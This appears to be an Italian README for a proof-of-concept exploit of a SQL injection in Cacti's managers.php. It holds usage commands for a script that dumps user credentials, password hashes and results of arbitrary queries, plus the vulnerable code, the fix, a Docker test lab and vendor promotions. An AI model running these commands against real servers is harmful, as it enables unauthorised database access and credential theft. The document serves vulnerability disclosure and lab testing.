
Exploit proof-of-concept per CVE-2026-40083, un'iniezione SQL in Cacti managers.php che consente agli utenti autenticati di estrarre database MySQL, credenziali utente e hash delle password. Include laboratorio Docker per i test.
Una proof-of-concept per CVE-2026-40083, una vulnerabilità di iniezione SQL in managers.php di Cacti che permette a qualsiasi utente autenticato con permessi SNMP Manager di leggere l'intero database MySQL, comprese le credenziali degli utenti e gli hash delle password.
Utilizzo:
# Verifica dell'iniezione (basata sul tempo)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin
# Estrazione di credenziali specifiche di un utente
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --target-id 1
# Estrazione del risultato di una query SQL arbitraria
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --query "SELECT version()"
# Enumerazione di tutti gli utenti (scansione ID 1-50)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --max-id 50
# Con proxy Burp
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --proxy http://127.0.0.1:8080
In managers.php, l'input utente da selected_graphs_array viene deserializzato tramite cacti_unserialize() e inserito direttamente in SQL senza sanificazione:
$selected_items = cacti_unserialize(stripslashes(gnrv('selected_graphs_array')));
if ($selected_items != false) {
// Nessuna validazione - implode diretto in SQL
db_execute('DELETE FROM snmpagent_managers WHERE id IN (' . implode(',', $selected_items) . ')');
}
Il parametro selected_graphs_array accetta un array serializzato PHP. Gli elementi dell'array vengono uniti con virgole e iniettati direttamente nella clausola IN.
POST /managers.php (action=actions, drp_action=1|2|3)
La vulnerabilità di iniezione SQL consente agli utenti autenticati con permessi SNMP Manager di eseguire query arbitrarie sul database. Ciò permette la lettura di tabelle contenenti dati utente, impostazioni, credenziali dei dispositivi e community SNMP, nonché l'estrazione di hash bcrypt e token API, il che può portare al compromesso degli account. Inoltre, la falla consente l'esecuzione di comandi con ritardo temporale, potenzialmente causando un denial of service esaurendo le connessioni simultanee al database.
7.2 Alto CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Il commit 52032e760 aggiunge array_map('intval', $selected_items) prima dell'implode per convertire tutti i valori in interi.
docker-compose up -d --build
Attendi circa 30 secondi per l'inizializzazione. Accedi a Cacti all'indirizzo http://localhost:8088
Credenziali predefinite: admin / admin
# Test dell'exploit
python3 exploit/poc.py --url http://localhost:8088 --user admin --password admin --target-id 1
Questo strumento è solo a scopo educativo e di ricerca. Usalo solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo programma.
QuimeraX Intelligence è una piattaforma avanzata di EASM e Cyber Threat Intelligence specializzata nell'identificazione di vulnerabilità critiche in sistemi complessi. La piattaforma monitora, rileva e avvisa i clienti in modo proattivo sulle minacce alla sicurezza, garantendo trasparenza e una rapida risposta ai potenziali rischi. I clienti ricevono notifiche immediate e rapporti completi se i loro sistemi risultano vulnerabili, consentendo loro di adottare misure protettive. scopri di più
Hakai Security è un'azienda di cybersecurity fondata da professionisti della sicurezza, impegnata nell'eccellenza tecnica. Offriamo soluzioni di sicurezza su misura, tra cui penetration testing avanzato, simulazioni realistiche di Red Team e pratiche di sviluppo sicuro per proteggere proattivamente i beni dei nostri clienti dalle minacce informatiche in evoluzione.
Hacking Club è la piattaforma di formazione dove impari la cybersecurity attraverso lezioni pratiche, laboratori e sfide create da esperti che lavorano nella nostra società di consulenza sulla sicurezza: direttamente dal campo di battaglia al tuo allenamento. Metti in pratica la vulnerabilità presentata in questo repository con l'hacking club! scopri di più